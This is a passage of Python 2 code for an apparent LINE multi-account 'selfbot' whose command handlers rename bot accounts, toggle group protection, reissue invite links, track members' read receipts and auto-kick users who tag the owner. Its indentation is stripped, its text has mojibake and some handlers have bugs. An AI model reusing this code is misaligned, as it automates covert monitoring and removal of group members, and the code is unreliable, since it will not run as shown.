ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
acil.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+acil.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname " in msg.text:
string = msg.text.replace("Allname ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
acil.sendText(msg.to,"NAMA BOT BERHASIL DI TERAPKAN MENJADI\n👉" + string + "👈")
elif "Allbio " in msg.text:
string = msg.text.replace("Allbio ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
acil.sendText(msg.to,"SEMUA TELAH DI UPDATE BIO PROFILE\n👉" + string + "👈")
elif "Mybio " in msg.text:
string = msg.text.replace("Mybio ","")
if len(string.decode('utf-8')) <= 500:
profile = acil.getProfile()
profile.statusMessage = string
acil.updateProfile(profile)
acil.sendText(msg.to,"??Update Bio\n👉" + string + "👈")
#------------------------------------------------------------------------------------------#
elif "Cn " in msg.text:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = acil.getProfile()
profile.displayName = string
acil.updateProfile(profile)
acil.sendText(msg.to,"Update Names👉 " + string + "👈")
#---------------------------------------------------------
elif "B1name " in msg.text:
string = msg.text.replace("B1name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B2name " in msg.text:
string = msg.text.replace("B2name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B3name " in msg.text:
string = msg.text.replace("B3name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B4name " in msg.text:
string = msg.text.replace("B4name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
#--------------------------------------------------------
elif "B5name " in msg.text:
string = msg.text.replace("B5name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to," Update Names👉" + string + "👈")
elif "Contact " in msg.text:
mmid = msg.text.replace("Contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
acil.sendMessage(msg)
elif msg.text in ["Allprotect:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN ON")
else:
acil.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
#=====================================================================================
elif msg.text in ["Allprotect:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
#=====================================================================================
elif msg.text.lower() == 'contact:on':
if wait["contact"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Sudah On")
else:
acil.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already open ✔")
else:
acil.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact:off':
if wait["contact"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah off ✖")
else:
acil.sendText(msg.to,"It is already off ✖")
else:
wait["contact"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"off already")
else:
acil.sendText(msg.to,"already Close ✔")
elif msg.text in ["Pro:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ??✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text in ['Prolink:on']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ['Proinvite:on']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
elif msg.text in ['Procancel:on']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'join:on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Ini sudah on✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'blocklist':
blockedlist = acil.getBlockedContactIds()
acil.sendText(msg.to, "Please wait...")
kontak = acil.getContacts(blockedlist)
num=1
msgs="✖User Blocked List✖\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text.lower() == 'join:off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Join Already Off✔")
else:
acil.sendText(msg.to,"Auto Join set off✔")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✔")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Pro:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Prolink:off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Proinvite:off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Procancel:off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif "Join:" in msg.text:
try:
strnum = msg.text.replace("Join:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Itu off undangan ditolak✖\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan✖")
else:
acil.sendText(msg.to,"Off undangan ditolak✖Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis✔")
else:
acil.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
acil.sendText(msg.to,"")
else:
acil.sendText(msg.to,"Weird value✖")
elif msg.text in ["Leave:on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"on✔")
else:
acil.sendText(msg.to,"Sudah terbuka ✔")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"Is already open✔")
elif msg.text in ["Leave:off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"off✖")
else:
acil.sendText(msg.to,"Sudah off✖")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"Is already close✔")
elif msg.text in ["Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✖")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"on ✔")
else:
acil.sendText(msg.to,"on ✔")
elif msg.text in ["Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"It is already turned off ✔")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Off ✖")
else:
acil.sendText(msg.to,"Off ✖")
elif msg.text.lower() == 'set':
md = "╔▬▬℘ґ∂ηк в❍тs▬▬╗\n║▬▬▬℘▬▬в▬▬▬║\n"
if wait["likeOn"] == True: md+="║☆║Like:ON➡️📱\n"
else: md+="║☆║Like:OFF➡️📴\n"
if wait["wcOn"] == True: md+="║☆║Welcome:ON➡️📱\n"
else: md+="║☆║Welcome:OFF➡️📴\n"
if wait["leftOn"] == True: md+="║☆║Left:ON➡️📱\n"
else: md+="║☆║Left:OFF➡️📴\n"
if wait["detectMention"] == True: md+="║☆║Respon:ON➡️📱\n"
else: md +="║☆║Respon:OFF➡️📴\n"
if wait["stickerMention"] == True: md+="║☆║Stickertag:ON➡️📱\n"
else: md +="║☆║Stickertag:OFF➡️📴\n"
if settings["simiSimi"] == True: md+="║☆║Simisimi:ON➡️📱\n"
else: md+="║☆║Simisimi:OFF➡️📴\n"
if wait["alwayRead"] == True: md+="║☆║Auto read:ON➡️📱\n"
else: md+="║☆║Auto read:OFF➡️📴\n"
if wait["Sider"] == True: md+="║☆║Sider:ON➡️📱\n"
else: md+="║☆║Sider:OFF➡️📴\n"
if wait["kickMention"] == True: md+="║☆║Notag:ON➡️📱\n"
else:md+="║☆║Notag:OFF➡️📴\n"
if wait["contact"] == True: md+="║☆║Contact:ON➡️📱\n"
else: md+="║☆║Contact:OFF➡️📴\n"
if wait["autoJoin"] == True: md+="║☆║Join:ON➡️📱\n"
else: md +="║☆║Join:OFF➡️📴\n"
if wait["autoCancel"]["on"] == True:md+="║☆║Cancel:" + str(wait["autoCancel"]["members"]) + "➡️📱\n"
else: md+= "║☆║Cancel:OFF➡️📴\n"
if wait["leaveRoom"] == True: md+="║☆║Leave:ON➡️📱\n"
else: md+="║☆║Leave:OFF➡️📴\n"
if wait["timeline"] == True: md+="║☆║Share:ON➡️📱\n"
else:md+="║☆║Share:OFF➡️📴\n"
if wait["autoAdd"] == True: md+="║☆║Add:ON➡️📱\n"
else:md+="║☆║Add:OFF➡️??\n"
if wait["commentOn"] == True: md+="║☆║Com:ON➡️📱\n"
else:md+="║☆║Com:OFF➡️??\n║▬║❨◄▬▬▬►❩\n║☆║◄═PROTECTION═►\n║▬║▬PRANKBOTS▬╣\n"
if wait["protect"] == True: md+="║☆║Pro:ON➡️📱\n"
else:md+="║☆║Pro:OFF➡️📴\n"
if wait["linkprotect"] == True: md+="║☆║ProtectQr:ON➡️📱\n"
else:md+="║☆║ProtectQr:OFF➡️📴\n"
if wait["inviteprotect"] == True: md+="║☆║Proinvite:ON➡️📱\n"
else:md+="║☆║Proinvite:OFF➡️📴\n"
if wait["cancelprotect"] == True: md+"║☆║Procancel:ON➡️📱\n"
else:md+="║☆║Procancel:OFF➡️📴\n"
if wait["pname"] == True: md+="║☆║Namelock:ON➡️📱\n"
else: md+="║☆║Namelock:OFF➡️📴\n"
acil.sendText(msg.to,md + "║▬▬▬℘▬▬в▬▬▬║\n╚▬▬℘ґ∂ηк в❍тs▬▬╝")
elif "Creatorgrup" == msg.text:
try:
group = acil.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
GS = acil.getContact(msg.to)
acil.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
acil.sendMessage(M)
W = acil.getContact(msg.to)
acil.sendText(msg.to,"old user")
elif cms(msg.text,["Add"]):
msg.contentType = 13
msg.contentMetadata = {'mid': 'u5818cb4404411c2e2e6e6937d172cca8'}
acil.sendText(msg.to,"❂•••••••••✧••••••••••❂")
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': 'udfaf52176415b46cb445ae2757ec85f3'}
acil.sendMessage(msg)
acil.sendText(msg.to,"❂••••••••✰•✰••••••••❂")
elif "Tagme: " in msg.text:
c = msg.text.replace("Tagme: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["tagme"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Welcome: " in msg.text:
c = msg.text.replace("Welcome: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["joingc"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Left: " in msg.text:
c = msg.text.replace("Left: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["leftgc"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Sider: " in msg.text:
c = msg.text.replace("Sider: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["sider1"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Setrespon: " in msg.text:
c = msg.text.replace("Setrespon: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["responName"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Cekresponse" in msg.text:
acil.sendText(msg.to,"👇Respon saat di tag👇\n" + wait["tagme"])
acil.sendText(msg.to,"👇Respon saat di add👇\n" + wait["comment"])
acil.sendText(msg.to,"👇Respon saat member join👇\n" + wait["joingc"])
acil.sendText(msg.to,"👇Respon saat member left👇\n" + wait["leftgc"])
acil.sendText(msg.to,"👇Respon saat member readchat👇\n" + wait["sider1"])
acil.sendText(msg.to,"👇Respon saat member memanggil👇\n" + wait["responName"])
acil.sendText(msg.to,"👇Respon di autolike👇\n" + wait["comment1"] + "\n\nHAL INI TIDAK DAPAT DI UBAH SESUAI HAK CIPTA\nCREATOR::PRANKBOTS")
elif msg.text in ["Left:on"]:
if wait["leftOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["leftOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Left:off"]:
if wait["leftOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["leftOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Welcome:on"]:
if wait['wcOn'] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah ON")
else:
wait["wcOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Welcome:off"]:
if wait['wcOn'] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Sudah off")
else:
wait['wcOn'] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text.lower() == 'group id':
gid = acil.getGroupIdsJoined()
h = "❂•••••••••L I S T I D G R O U P••••••••••❂\n "
for i in gid:
h += "[%s]:%s\n" % (acil.getGroup(i).name,i)
acil.sendText(msg.to,h)
elif msg.text in ["Gcancelall"]:
gid = acil.getGroupIdsInvited()
for i in gid:
acil.rejectGroupInvitation(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Success menolak semua undangan")
else:
acil.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Add:on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already On✔")
else:
acil.sendText(msg.to,"Already On✔")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already On✔")
else:
acil.sendText(msg.to,"Already On✔")
elif msg.text in ["Add:off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini sudah off✖")
else:
acil.sendText(msg.to,"Hal ini sudah dimatikan✖")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already Off✖")
else:
acil.sendText(msg.to,"Untuk mengaktifkan-off✖")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
acil.sendText(msg.to,"✨We changed the message✨")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
acil.sendText(msg.to,"✨We changed the Help✨")
elif "Msg add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JP":
acil.sendText(msg.to,"✨Kami mengubah pesan✨")
else:
acil.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message confirm"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
acil.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
acil.sendText(msg.to,"I changed the language to engglis✔")
else:
wait["lang"] = "JP"
acil.sendText(msg.to,"I changed the language to indonesia✔")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["comment"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif msg.text in ["Comment:on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Aku berada di✔")
else:
acil.sendText(msg.to,"To open✔")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"✔")
else:
acil.sendText(msg.to,"✔")
elif msg.text in ["Com:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini sudah off ✖")
else:
acil.sendText(msg.to,"It is already turned off ✖")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Off✖")
else:
acil.sendText(msg.to,"To turn off✖")
elif msg.text in ["Com","Comment"]:
acil.sendText(msg.to,"✨Auto komentar saat ini telah ditetapkan sebagai berikut✨\n\n" + str(wait["comment"]))
elif msg.text in ["Glink","Url"]:
if msg.toType == 2:
g = acil.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
acil.updateGroup(g)
gurl = acil.reissueGroupTicket(msg.to)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
acil.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif "gurl+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = acil.reissueGroupTicket(gid)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
acil.sendText(msg.to,"グループ以外ã§ã¯ä½¿ç”¨ã§ãã¾ã›ã‚“👈")
elif "gurl" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = acil.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
acil.updateGroup(x)
gurl = acil.reissueGroupTicket(msg.to)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Can't be used outside the group")
else:
acil.sendText(msg.to,"Not for use less than group")
# else:
# acil.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Comban"]:
wait["wblack"] = True
acil.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist…”✚")
elif msg.text in ["Comban del"]:
wait["dblack"] = True
acil.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist…”✚")
elif msg.text in ["Comban cek"]:
if wait["commentBlack"] == {}:
acil.sendText(msg.to,"Nothing in the blacklist✖")
else:
acil.sendText(msg.to,"The following is a blacklist✔")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif "Namelock:on" in msg.text:
# if msg.from_ in admin or owner:
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN ON")
else:
acil.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
# if msg.from_ in admin or owner:
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
acil.sendText(msg.to,"BOT API SIMISIMI TURN ON")
ki.sendText(msg.to,"already turn active")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
acil.sendText(msg.to,"BOT API SIMISIMI TURN OFF")
ki.sendText(msg.to,"already non active")
elif msg.text in ["Read on","Read:on"]:
if wait['alwayRead'] == True:
if wait["alwayRead"] == "JP":
acil.sendText(msg.to,"Auto Sider ON")
else:
wait["alwayRead"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Read off","Read:off"]:
if wait['alwayRead'] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Sider OFF")
else:
wait['alwayRead'] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF auto read")
elif msg.text in ["Deletechat"]:
if wait['Removechat'] == True:
if wait["Removechat"] == "JP":
acil.sendText(msg.to,"Success!!!")
if wait['Removechat'] == False:
if wait["lang"] == "JP":
pass
elif "Sider:on" in msg.text:
# if msg.toType == 2:
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
elif "Sider:off" in msg.text:
# if msg.toType == 2:
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
else:
acil.sendText(msg.to, "Heh Belom Di Set")
elif msg.text in ["Autorespon on","Autorespon:on","Respon on","Respon:on"]:
if wait["detectMention"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Respon ON")
else:
wait["detectMention"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Autorespon off","Autorespon:off","Respon off","Respon:off"]:
if wait["detectMention"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Respon OFF")
else:
wait["detectMention"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text in ["Notag:on"]:
if wait["kickMention"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"☠️DANGER TAG KICK ON☠️")
else:
wait["kickMention"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"already ON")
elif msg.text in ["Notag:off"]:
if wait["kickMention"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"SELF PROTECT TAG OFF ✔")
else:
wait["kickMention"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"already turn OF")
elif msg.text.lower() == 'Clock:on':
if wait["clock"] == True:
acil.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
acil.sendText(msg.to,"Jam on✔")
elif msg.text in ["Stickertag:on"]:
if wait["stickerMention"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah on")
else:
wait["stickerMention"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Stickertag:off"]:
if wait["stickerMention"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah off")
else:
wait["stickerMention"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text.lower() == 'Clock:off':
if wait["clock"] == False:
acil.sendText(msg.to,"Hal ini sudah off✖")
else:
wait["clock"] = False
